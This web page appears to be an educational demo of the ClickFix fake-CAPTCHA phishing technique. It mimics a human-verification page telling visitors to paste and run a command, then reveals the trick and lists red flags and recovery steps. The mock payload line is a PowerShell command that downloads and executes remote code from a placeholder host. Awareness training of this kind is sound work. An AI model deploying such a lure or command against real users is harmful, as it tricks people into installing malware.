Verify you are human
Please complete the verification below to continue.
HumanCheck
Privacy — Terms
✓
Additional verification required
To prove you are human, please complete the following steps:
-
1
Press Windows + R on your keyboard
-
2
Press Ctrl + V to paste the verification code
-
3
Press Enter to verify
powershell -c "iwr https://not-a-real-url.example/verify | iex"
🎣
Gotcha! This is the ClickFix phishing technique.
Don’t worry — nothing was copied to your clipboard and no command was executed. This demo is purely educational.
What just happened?
This is a real and growing attack called ClickFix (also known as “fake CAPTCHA”).
Attackers clone a CAPTCHA or “verify you’re human” page. When you click it, the page silently
copies a malicious command to your clipboard, then instructs you to open Run (Win+R),
paste it (Ctrl+V), and press Enter — effectively executing malware with your own hands.
Red flags you could have spotted:
- No legitimate CAPTCHA ever asks you to open Run, Terminal, or PowerShell. Ever. Full stop.
- No legitimate site asks you to paste anything into a system dialog.
- Instructions involving Win+R, Ctrl+V, Enter are a huge warning. That keystroke sequence only exists in attack tutorials.
- Unfamiliar domain. Real Google reCAPTCHA loads from
google.com, hCaptcha fromhcaptcha.com. - Strange context. Why does this random site need you to verify? What were you doing before you landed here?
What to do if this happens for real:
- Close the tab immediately. Do not follow the instructions.
- If you already pasted into Run but haven’t pressed Enter — clear the field and close it. You’re fine.
- If you already executed the command, disconnect from the network, run a full antivirus scan, and change your important passwords from a different device. Report it to your IT/security team.
- Clear your clipboard by copying something harmless after you realize what happened.